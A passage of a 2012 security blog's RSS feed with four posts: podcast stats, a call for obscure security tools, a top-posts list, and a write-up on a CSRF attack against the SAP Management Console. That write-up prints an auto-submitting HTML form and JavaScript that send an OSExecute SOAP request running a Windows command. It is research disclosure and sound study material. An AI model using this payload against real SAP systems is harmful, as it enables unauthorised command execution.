		<guid isPermaLink="false">http://blog.c22.cc/?p=3726</guid>
		<description><![CDATA[2011 was a good year for the Eurotrash Security Podcast. We did some new stuff (being a media sponsor for the FIRST conference, and being 50% of the FIRST Podcast with Martin McKeay from the Network Security podcast), and we kept to an almost monthly schedule&#8230; which is much harder than you think. We also brought Ben [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.c22.cc&amp;blog=1599597&amp;post=3726&amp;subd=c22blog&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p style="text-align:center;"><a href="http://www.eurotrashsecurity.eu"><img class="aligncenter" src="http://www.eurotrashsecurity.eu/images/eurotrash.jpg" alt="" width="421" height="100" /></a></p>
<p>2011 was a good year for the Eurotrash Security Podcast. We did some new stuff (<em>being a media sponsor for the FIRST conference, and being 50% of the <a href="http://conference.first.org/podcasts.aspx" target="_blank">FIRST Podcast</a> with Martin McKeay from the <a href="http://netsecpodcast.com/" target="_blank">Network Security podcast</a></em>), and we kept to an almost monthly schedule&#8230; which is much harder than you think. We also brought Ben (AKA Wicked Clown, AKA Mr Inappropriate) into the fold, and immediately started to need to edit out offensive content more often. A coincidence I&#8217;m sure <img src='http://s1.wp.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p>In general 2011 was a big year for us&#8230; and 2012 could be even bigger. Eurotrashsec got nominated for a <a href="http://www.ashimmy.com/2012/01/and-the-nominees-are.html" target="_blank">social security blogger awards</a> in the best security podcast category! An honor to be sure&#8230; even if we don&#8217;t (<em>and we won&#8217;t</em>) win.</p>
<p>So what was up in 2011 for Eurotrashsec&#8230; well, the man behind the curtain, <a href="http://twitter.com/xme" target="_blank">@xme</a>, sent over some stats and a wicked mashup of episodes downloads overlayed on Google Maps&#8230; so let&#8217;s get to some stats.</p>
<h4>General stats:</h4>
<ul>
<li>Total hits: 2.493.500</li>
<li>Total MP3 downloads: 103.346</li>
<li>Total unique IP&#8217;s: 56.152</li>
<li>Visits: 5.013</li>
<li>Unique visitors: 3.501</li>
</ul>
<div>Nice to see that the podcast topped the 100,000 downloads in 2011. I&#8217;m sure <a href="http://pauldotcom.com" target="_blank">Pauldotcom</a> does that in a weekend, but we like to be niche&#8230; honest! It&#8217;s not to late to download the episodes you missed now you know <img src='http://s1.wp.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' />  &#8211;&gt; <a href="http://www.eurotrashsecurity.eu/episodes/eurotrash.xml" target="_blank">XML</a></div>
<h4>Top-5 countries:</h4>
<ul>
<li>UK</li>
<li>US</li>
<li>BE</li>
<li>DE</li>
<li>FR</li>
</ul>
<div>I&#8217;m pretty sure that the French listeners will be dropping after the last podcast&#8230; still we like to try and be equal opportunity offenders (<em>we like to offend everybody equally that is</em>). So looks like we need to move up the list to our German listeners next <img src='http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </div>
<div></div>
<div>I threw together some nice graphs in Excel (<em><a href="http://twitter.com/wimremes" target="_blank">@wimremes</a> is probably turning in his grave right now</em>) that show the most popular episodes of 2011 and the downloads (<em>full show and microtrash episodes</em>). I also made a screenshot of <a href="http://twitter.com/xme" target="_blank">@xme&#8217;s</a> wonderful map overlay &#8211;&gt; full version <a href="http://blog.rootshell.be/stuff/eurotrashsec/" target="_blank">HERE</a></div>
<div></div>

<a href='http://blog.c22.cc/2012/01/19/eurotrashsec-the-year-that-was/eurotrash_main_downloads/' title='eurotrash_main_downloads'><img data-attachment-id='3727' data-orig-size='1504,700' data-liked='0'width="150" height="69" src="http://c22blog.files.wordpress.com/2012/01/eurotrash_main_downloads.png?w=150&#038;h=69" class="attachment-thumbnail" alt="eurotrash_main_downloads" title="eurotrash_main_downloads" /></a>
<a href='http://blog.c22.cc/2012/01/19/eurotrashsec-the-year-that-was/eurotrash_map_overlay/' title='eurotrash_map_overlay'><img data-attachment-id='3729' data-orig-size='1123,606' data-liked='0'width="150" height="80" src="http://c22blog.files.wordpress.com/2012/01/eurotrash_map_overlay.png?w=150&#038;h=80" class="attachment-thumbnail" alt="eurotrash_map_overlay" title="eurotrash_map_overlay" /></a>
<a href='http://blog.c22.cc/2012/01/19/eurotrashsec-the-year-that-was/eurotrash_microtrash_downloads/' title='eurotrash_microtrash_downloads'><img data-attachment-id='3728' data-orig-size='1315,653' data-liked='0'width="150" height="74" src="http://c22blog.files.wordpress.com/2012/01/eurotrash_microtrash_downloads.png?w=150&#038;h=74" class="attachment-thumbnail" alt="eurotrash_microtrash_downloads" title="eurotrash_microtrash_downloads" /></a>

<h3 style="text-align:center;"><strong>Let 2012 begin!</strong></h3>
<br /> Tagged: <a href='http://blog.c22.cc/tag/eurotrashsec/'>Eurotrashsec</a>, <a href='http://blog.c22.cc/tag/podcast/'>podcast</a>, <a href='http://blog.c22.cc/tag/stats/'>stats</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/c22blog.wordpress.com/3726/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/c22blog.wordpress.com/3726/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/c22blog.wordpress.com/3726/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/c22blog.wordpress.com/3726/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/c22blog.wordpress.com/3726/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/c22blog.wordpress.com/3726/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/c22blog.wordpress.com/3726/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/c22blog.wordpress.com/3726/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/c22blog.wordpress.com/3726/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/c22blog.wordpress.com/3726/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/c22blog.wordpress.com/3726/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/c22blog.wordpress.com/3726/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/c22blog.wordpress.com/3726/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/c22blog.wordpress.com/3726/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.c22.cc&amp;blog=1599597&amp;post=3726&amp;subd=c22blog&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://blog.c22.cc/2012/01/19/eurotrashsec-the-year-that-was/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">ChrisJohnRiley</media:title>
		</media:content>

		<media:content url="http://www.eurotrashsecurity.eu/images/eurotrash.jpg" medium="image" />

		<media:content url="http://c22blog.files.wordpress.com/2012/01/eurotrash_main_downloads.png?w=150" medium="image">
			<media:title type="html">eurotrash_main_downloads</media:title>
		</media:content>

		<media:content url="http://c22blog.files.wordpress.com/2012/01/eurotrash_map_overlay.png?w=150" medium="image">
			<media:title type="html">eurotrash_map_overlay</media:title>
		</media:content>

		<media:content url="http://c22blog.files.wordpress.com/2012/01/eurotrash_microtrash_downloads.png?w=150" medium="image">
			<media:title type="html">eurotrash_microtrash_downloads</media:title>
		</media:content>
	</item>
		<item>
		<title>Unsung heros</title>
		<link>http://blog.c22.cc/2012/01/13/unsung-heros/</link>
		<comments>http://blog.c22.cc/2012/01/13/unsung-heros/#comments</comments>
		<pubDate>Fri, 13 Jan 2012 13:30:36 +0000</pubDate>
		<dc:creator>ChrisJohnRiley</dc:creator>
				<category><![CDATA[Penetration Test]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[forgotten]]></category>
		<category><![CDATA[tools]]></category>

		<guid isPermaLink="false">http://blog.c22.cc/?p=3711</guid>
		<description><![CDATA[tl;dr : I&#8217;m searching for your suggestions for the unsung heroes of security tools (not the usual things we talk about every day). Please send your entries via the form HERE&#8230; there will be a random prize for people taking part. Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.c22.cc&amp;blog=1599597&amp;post=3711&amp;subd=c22blog&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>tl;dr : I&#8217;m searching for your suggestions for the unsung heroes of security tools (not the usual things we talk about every day). Please send your entries via the form <a title="Unsung Heroes" href="#contactform">HERE</a>&#8230; there will be a random prize for people taking part.</p>
<p><img class="alignleft  wp-image-3717" style="margin:5px 8px;" title="tinytags" src="http://c22blog.files.wordpress.com/2012/01/tinytags.png?w=95&#038;h=209" alt="" width="95" height="209" />Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; if you&#8217;re anything like me then it happens all to often. As an industry we have more ideas, methods and tiny tools/scripts than we know what to do with. Every time a conference rolls around (<em>which is almost daily now it seems - <a href="http://blog.thinkst.com/2011/01/is-answer-more-infosec-conferences.html">Is the answer more InfoSec Conferences?</a></em>) people are eager to pimp their wares (<em>I&#8217;m no different</em>), and sometimes it&#8217;s needed to show proof of concept, new technique or something else equally mind-blowing. Some (<em>and only some</em>) of those new techniques, methods, attacks, &#8230; will make the jump from niche tool into a framework (<em>such as Metasploit or nmap</em>). Some others will live on in individual tools/scripts. Projects like <a href="http://www.backtrack-linux.org/" target="_blank">Backtrack Linux</a> try to gather the most well-known of these tools into a central distribution, but inevitably there&#8217;s always the one or two real gems that fall between the gaps. You can&#8217;t cram everything into any single framework or distribution, otherwise it becomes unusable.</p>
<p>So where does that leave us? It&#8217;s leaves us with Google (<em>or Bing, if you&#8217;re really hard up</em>) as the only hope for finding those niche solutions for testing that funky web app that you didn&#8217;t even know would run on AIX 5.2.</p>
<p>Previously some very nice people have gone out of their way to document and bring these niche tools together, lest they be lost to the annuls of time. A few years back <a href="http://twitter.com/mubix" target="_blank">@mubix</a> took the time to catalogue the tools released at just one conference. The <a href="https://www.defcon.org/html/links/dc-tools.html" target="_blank">Defcon Tools page</a> shows the tools that could be catalogued after the Defcon 18 conference. That&#8217;s a lot of tools for a 3 day period! No wonder we skip over some of the ones we should be paying attention to&#8230; and there I finally get to the point of this blog post.</p>
<p style="text-align:center;"><a href="http://c22blog.files.wordpress.com/2012/01/thankyoumario.gif"><img class="aligncenter" style="margin-top:6px;margin-bottom:6px;" title="Wow, who knew animated GIFs still existed!" src="http://c22blog.files.wordpress.com/2012/01/thankyoumario.gif?w=410&#038;h=358" alt="No GIF for you.... bad panda!" width="410" height="358" /></a></p>
<p>I&#8217;m attempting to (<em>and I say attempting, as it relies on you the readers to help out</em>) gather suggestions for your &#8220;unsung hero&#8221; of the tools world. As we work in Infosec I&#8217;m looking specifically to gather a list of tools that aren&#8217;t on ever penetration tester, or forensic investigators list, but that you have respect for. We all love Metasploit, nmap and the other popular tools voted for on the <a href="http://sectools.org/" target="_blank">SecTool TOP 125 list</a>. However I&#8217;m looking for something a bit different here, something off the beat and track.</p>
<p>So, if you&#8217;ve got a favourite tool (<em>or 2</em>) that you think are your unsung heroes, I want to hear about it. Don&#8217;t wait, don&#8217;t even think&#8230; you&#8217;ve got one in mind right now&#8230; just fill in that form and click submit!</p>
<p><strong>Oh, did I forget to mention! I&#8217;ll be doing a random draw of 1 of the entries and sending you a book. Not sure what just yet, but I&#8217;m sure you&#8217;ll like it <img src='http://s1.wp.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' />  You&#8217;ve gotta be in it to win it!</strong>
<p>
<a name="contactform">[contact-form]</a></p>
<p><span style="text-decoration:underline;">Please share this link with your friends, work colleagues, drinking buddies, or hobos&#8230; the more the merrier! </span></p>
<p><strong>Short link</strong> &#8211;&gt; <strong><a href="http://c22.cc/heroes" target="_blank">http://c22.cc/heroes</a></strong></p>
<p><span style="color:#333333;"><em>* Why do I request your email address&#8230; simple, at some point (if this goes to plan) there will be a vote. I&#8217;m happy to email out links to the vote as and when&#8230; then again, if you don&#8217;t want to give me your email address, that&#8217;s fine too. Not like I&#8217;m gonna sell it <img src='http://s1.wp.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </em></span></p>
<div></div>
<br /> Tagged: <a href='http://blog.c22.cc/tag/forgotten/'>forgotten</a>, <a href='http://blog.c22.cc/tag/tools/'>tools</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/c22blog.wordpress.com/3711/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/c22blog.wordpress.com/3711/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/c22blog.wordpress.com/3711/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/c22blog.wordpress.com/3711/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/c22blog.wordpress.com/3711/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/c22blog.wordpress.com/3711/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/c22blog.wordpress.com/3711/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/c22blog.wordpress.com/3711/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/c22blog.wordpress.com/3711/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/c22blog.wordpress.com/3711/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/c22blog.wordpress.com/3711/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/c22blog.wordpress.com/3711/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/c22blog.wordpress.com/3711/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/c22blog.wordpress.com/3711/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.c22.cc&amp;blog=1599597&amp;post=3711&amp;subd=c22blog&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://blog.c22.cc/2012/01/13/unsung-heros/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">ChrisJohnRiley</media:title>
		</media:content>

		<media:content url="http://c22blog.files.wordpress.com/2012/01/tinytags.png" medium="image">
			<media:title type="html">tinytags</media:title>
		</media:content>

		<media:content url="http://c22blog.files.wordpress.com/2012/01/thankyoumario.gif" medium="image">
			<media:title type="html">Wow, who knew animated GIFs still existed!</media:title>
		</media:content>
	</item>
		<item>
		<title>The CSRF that almost was&#8230;</title>
		<link>http://blog.c22.cc/2012/01/08/the-csrf-that-almost-was/</link>
		<comments>http://blog.c22.cc/2012/01/08/the-csrf-that-almost-was/#comments</comments>
		<pubDate>Sun, 08 Jan 2012 17:07:38 +0000</pubDate>
		<dc:creator>ChrisJohnRiley</dc:creator>
				<category><![CDATA[Penetration Test]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[CSRF]]></category>
		<category><![CDATA[sap]]></category>
		<category><![CDATA[So Close]]></category>
		<category><![CDATA[SOAP]]></category>

		<guid isPermaLink="false">http://blog.c22.cc/?p=3689</guid>
		<description><![CDATA[It&#8217;s strange sometimes where your inspiration comes from, but regardless of where, it&#8217;s good to be back in the saddle when it comes to really enjoying some research. Some people close to me might already be aware, but I&#8217;ve not really been &#8220;into it&#8221; for a while now, as can be seen by the lack [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.c22.cc&amp;blog=1599597&amp;post=3689&amp;subd=c22blog&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><img class="alignright size-full wp-image-3698" style="margin:9px;" title="SAP-Fight-Club-SML" src="http://c22blog.files.wordpress.com/2012/01/sap-fight-club-sml.png?w=630" alt=""   /></p>
<p>It&#8217;s strange sometimes where your inspiration comes from, but regardless of where, it&#8217;s good to be back in the saddle when it comes to really enjoying some research. Some people close to me might already be aware, but I&#8217;ve not really been &#8220;into it&#8221; for a while now, as can be seen by the lack of blog posts or interesting content. Lets hope this is the light at the end of that tunnel (<em>&#8230; and that it&#8217;s not a train, obviously ;</em>)</p>
<p>So, back to the interesting idea. A lot of the research I did into the SAP Management Console was about what an attacker could do accessing it from the internet, or directly when on the local LAN segment. Although there&#8217;s probably a lot more attackers could do with this stuff, the protections that SAP have rolled out should be enough to deter most casual attackers. I&#8217;d also looked at what attackers could do to attack client-side, by sitting in the middle and providing a tainted JAVA applet when an administrator comes to load the SAP Management Console&#8230; or even forcing Basic Authentication at points before the application requires it. The thing I&#8217;d not really done was think about what an attacker could do from the internet without ever actually having access to the SAP Management Console.</p>
<p>Looking back at history a bit, I re-read some posts on using CSRF attacks to change settings on local ADSL routers. The attack isn&#8217;t new, and there&#8217;s more than a few resources discussing it. However I was interested to see if this sort of attack could be used to perform remote code execution on the SAP Management Console using the OSExecute method. Normally this is an authenticated method, so an attacker would need a username / password, but by using CSRF, this seemed like it could be bypassed if certain conditions were met (<em>i.e. an administrator can be lured to the CSRF page, and they are logged into the SAP MC, or have clicked the &#8220;save password&#8221; prompt to save time on future logons</em>).</p>
<p>Starting off I needed to find a solution to force a user to perform a POST request, as the SOAP message can&#8217;t be sent over GET unfortunately. After a bit or playing and research I stumbled on a post by <a href="http://pentestmonkey.net/blog/csrf-xml-post-request" target="_blank">pentest monkey</a> detailing some work he&#8217;d done on the same issue. Using an HTML form containing the contents of the POST request as the name field, it was possible to send the desired request. By adding a JavaScript trigger it was also possible to send the form (and thus the POST request) without user actions. So, all well and good.</p>
<p><pre class="brush: xml;">&lt;FORM NAME=&quot;sap&quot; id=&quot;sap&quot; ENCTYPE=&quot;text/plain&quot; action=&quot;http://server.example.com:50013&quot; method=&quot;POST&quot;&gt;
&lt;input type=&quot;hidden&quot; name='&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;&lt;SOAP-ENV:Envelope xmlns:SOAP-ENV=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot; xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xmlns:xs=&quot;http://www.w3.org/2001/XMLSchema&quot;&gt;&lt;SOAP-ENV:Header&gt;&lt;sapsess:Session xlmns:sapsess=&quot;http://www.sap.com/webas/630/soap/features/session/&quot;&gt;&lt;enableSession&gt;true&lt;/enableSession&gt;&lt;/sapsess:Session&gt;&lt;/SOAP-ENV:Header&gt;&lt;SOAP-ENV:Body&gt;&lt;ns1:OSExecute xmlns:ns1=&quot;urn:SAPControl&quot;&gt;&lt;command&gt;cmd /c echo &quot;wimming&quot; &gt; c:\temp\proof.txt&lt;/command&gt;&lt;async&gt;0&lt;/async&gt;&lt;/ns1:OSExecute&gt;&lt;/SOAP-ENV:Body&gt;&lt;/SOAP-ENV:Envelope&gt;'&gt;
&lt;/FORM&gt;
</pre></p>
<p>The above FORM includes a complete SOAP request (<em>using the OSExecute method</em>) within the first input name field. In the case of the POC script, the servername is set using a variable passed to the page forming the POST message. The name of the SAP system internally can easily be found using one of the SAP Management Console modules that are now in Metasploit.</p>
<p>To get the form to automatically submit without user interaction, I added the following JavaScript&#8230; (<em>tested in Chrome, IE and Firefox</em>)</p>
<p><pre class="brush: jscript;">
function myfunc () {
var frm = document.getElementById(&quot;sap&quot;);
frm.submit();
}
window.onload = myfunc;
</pre></p>
<p>The result is a page that forms a valid POST request to the SAP Management Console inside the targets network.</p>
<p><pre class="brush: xml;">
POST / HTTP/1.1
Host: server.example.com:50013
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:6.0.1) Gecko/20100101 Firefox/6.0.1
Referer: http://www.catch22insecurity.com/POC/soap_post.php?servername=server.example.com
Content-Type: text/plain
Content-Length: 575

&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;&lt;SOAP-ENV:Envelope xmlns:SOAP-ENV=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot; xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xmlns:xs=&quot;http://www.w3.org/2001/XMLSchema&quot;&gt;&lt;SOAP-ENV:Header&gt;&lt;sapsess:Session xlmns:sapsess=&quot;http://www.sap.com/webas/630/soap/features/session/&quot;&gt;&lt;enableSession&gt;true&lt;/enableSession&gt;&lt;/sapsess:Session&gt;&lt;/SOAP-ENV:Header&gt;&lt;SOAP-ENV:Body&gt;&lt;ns1:OSExecute xmlns:ns1=&quot;urn:SAPControl&quot;&gt;&lt;command&gt;cmd /c echo &quot;wimming&quot; &gt; c:\temp\proof.txt&lt;/command&gt;&lt;async&gt;0&lt;/async&gt;&lt;/ns1:OSExecute&gt;&lt;/SOAP-ENV:Body&gt;&lt;/SOAP-ENV:Envelope&gt;=
</pre></p>
<p>Despite the additional &#8220;=&#8221; sign being tagged onto the end (<em>as a result of the HTML FORM</em>), the request is valid and will be honored by the SAP Management Console if valid credentials are already saved in the browser being used, or a valid Basic Auth header is present&#8230; and THIS is where the &#8220;<em>almost was</em>&#8221; comes into play.</p>
<p>When testing it became evident that browsers (<em>IE and Firefox at the very least</em>) don&#8217;t automate the response of valid credentials when they&#8217;re stored in the browsers password store. When the SAP Management Console responds to the target asking for credentials, even if they&#8217;re stored in the browser, the user is prompted to click OK on the already filled out username/password box.</p>
<h4><a href="http://c22blog.files.wordpress.com/2012/01/sap_csrf_basicauth.png"><img class="aligncenter  wp-image-3697" title="SAP_csrf_basicauth" src="http://c22blog.files.wordpress.com/2012/01/sap_csrf_basicauth.png?w=500&#038;h=322" alt="" width="500" height="322" /></a></h4>
<p>Well that&#8217;s a pity! &#8230; and no change when serving it up over SSL either.</p>
<h4>So where does this work?</h4>
<p>So as to not totally come out of this a looser, where does (<em>or could</em>) this attack work. Sticking with SAP Management Console there are a few places it could still work well.</p>
<ul>
<li>The obvious &#8211;&gt; Admins that click-through anything. If the user accepts (<em>or enters</em>) valid credentials, then the OSExecute will be successful.</li>
<li>SAP MC Methods that are not protected &#8211;&gt; Anything where a blind request can be sent and an action is performed without requesting credentials. This is limited in SAP, and as no response can be received by the attacker, the scope is limited.</li>
<li>Attacks against specific SSO implementations &#8211;&gt; Not naming names, but there are more than a few Single Sign On solutions out there that take the place of browser passwords stores (<em>and other password stores</em>). These solutions may act differently when saving a password&#8230; I&#8217;ve seen implementations that fill in the credentials and submit them without user action.</li>
<li>Situations where an SAP Administrator has already performed direct actions against the SAP Management Console through the browser, thus setting a valid Basic Auth token &#8211;&gt; Few and far between, as the interaction is mostly through MMC of JAVA applets that do not need to use the browser.</li>
<li>Exploit delivery &#8211;&gt; There are, and will probably be in the future, valid one request exploits against SAP Management Console. This attack vector would allow these exploits to be delivered as long as no credentials or other user input is required.</li>
</ul>
<p>Well there it is&#8230; The time invested was minimal and as with everything, you learn as you fail&#8230; Feel free to take a look at the POC I put up on my site if you want to try it out for yourself. Please don&#8217;t abuse it though!</p>
<h3>POC .:</h3>
<ul>
<li>HTTP &#8211;&gt; http://www.catch22insecurity.com/POC/soap_post.php?servername=server.example.com</li>
<li>HTTPS &#8211;&gt;https://www.catch22insecurity.com/POC/soap_post_ssl.php?servername=server.example.com
<ul>
<li>Self signed certificates on HTTPS may cause issues in your testing. YMMV</li>
</ul>
</li>
</ul>
<br /> Tagged: <a href='http://blog.c22.cc/tag/csrf/'>CSRF</a>, <a href='http://blog.c22.cc/tag/sap/'>sap</a>, <a href='http://blog.c22.cc/tag/so-close/'>So Close</a>, <a href='http://blog.c22.cc/tag/soap/'>SOAP</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/c22blog.wordpress.com/3689/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/c22blog.wordpress.com/3689/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/c22blog.wordpress.com/3689/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/c22blog.wordpress.com/3689/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/c22blog.wordpress.com/3689/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/c22blog.wordpress.com/3689/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/c22blog.wordpress.com/3689/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/c22blog.wordpress.com/3689/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/c22blog.wordpress.com/3689/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/c22blog.wordpress.com/3689/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/c22blog.wordpress.com/3689/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/c22blog.wordpress.com/3689/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/c22blog.wordpress.com/3689/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/c22blog.wordpress.com/3689/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.c22.cc&amp;blog=1599597&amp;post=3689&amp;subd=c22blog&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://blog.c22.cc/2012/01/08/the-csrf-that-almost-was/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">ChrisJohnRiley</media:title>
		</media:content>

		<media:content url="http://c22blog.files.wordpress.com/2012/01/sap-fight-club-sml.png" medium="image">
			<media:title type="html">SAP-Fight-Club-SML</media:title>
		</media:content>

		<media:content url="http://c22blog.files.wordpress.com/2012/01/sap_csrf_basicauth.png?w=500" medium="image">
			<media:title type="html">SAP_csrf_basicauth</media:title>
		</media:content>
	</item>
		<item>
		<title>Top 5 posts of 2011</title>
		<link>http://blog.c22.cc/2012/01/01/top-5-posts-of-2011/</link>
		<comments>http://blog.c22.cc/2012/01/01/top-5-posts-of-2011/#comments</comments>
		<pubDate>Sun, 01 Jan 2012 15:00:57 +0000</pubDate>
		<dc:creator>ChrisJohnRiley</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[2011]]></category>
		<category><![CDATA[blog]]></category>
		<category><![CDATA[year in review]]></category>

		<guid isPermaLink="false">http://blog.c22.cc/?p=3683</guid>
		<description><![CDATA[As the year begins a new I thought I&#8217;d take a look back at what people have been reading on blog.c22.cc in the last 12 months. Alongside hits straight to the main page (18,652), about me page (1,768 for some reason) and the usual heavy traffic on some older 2009/2010 posts (25,000+), the following new [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.c22.cc&amp;blog=1599597&amp;post=3683&amp;subd=c22blog&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><img class="wp-image-3684 alignright" style="margin:8px;" title="2011_cal" src="http://c22blog.files.wordpress.com/2011/12/2011_cal.jpg?w=257&#038;h=191" alt="" width="257" height="191" />As the year begins a new I thought I&#8217;d take a look back at what people have been reading on blog.c22.cc in the last 12 months. Alongside hits straight to the main page (18,652), about me page (1,768 <em>for some reason</em>) and the usual heavy traffic on some older 2009/2010 posts (25,000+), the following new 2011 posts proved to be the most interesting.</p>
<p style="padding-left:30px;"><a href="http://blog.c22.cc/2011/01/29/shmoocon-2011-team-joch-vs-android-the-ultimate-showdown/">Shmoocon 2011: TEAM JOCH vs. Android: The Ultimate Showdown</a> &#8211;&gt; 1,562 visits</p>
<p style="padding-left:30px;"><a href="http://blog.c22.cc/2011/04/22/surveymonkey-ip-spoofing/">SurveyMonkey: IP Spoofing</a> &#8211;&gt; 1,481 visits</p>
<p style="padding-left:30px;"><a href="http://blog.c22.cc/2011/01/14/setting-up-your-own-sap-netweaver-test-lab/">Setting up your own SAP Netweaver test lab</a> &#8211;&gt; 1,421 visits</p>
<p style="padding-left:30px;"><a href="http://blog.c22.cc/2011/09/20/brucon-lt-ssl-impersonation-in-5-minutes-or-less/">{BruCON LT} SSL Impersonation in 5 minutes or less!</a> &#8211;&gt; 1,375 visits</p>
<p style="padding-left:30px;"><a href="http://blog.c22.cc/2011/01/29/shmoocon-2011-printer-to-pwnd/">Shmoocon 2011: Printer to Pwnd </a>&#8211;&gt; 1,368 visits</p>
<p>It&#8217;s nice to see that people aren&#8217;t only coming to the blog for conference coverage, although Shmoocon coverage seems surprisingly popular&#8230; Let&#8217;s hope that the 2012 Shmoocon coverage proves just as interesting <img src='http://s1.wp.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
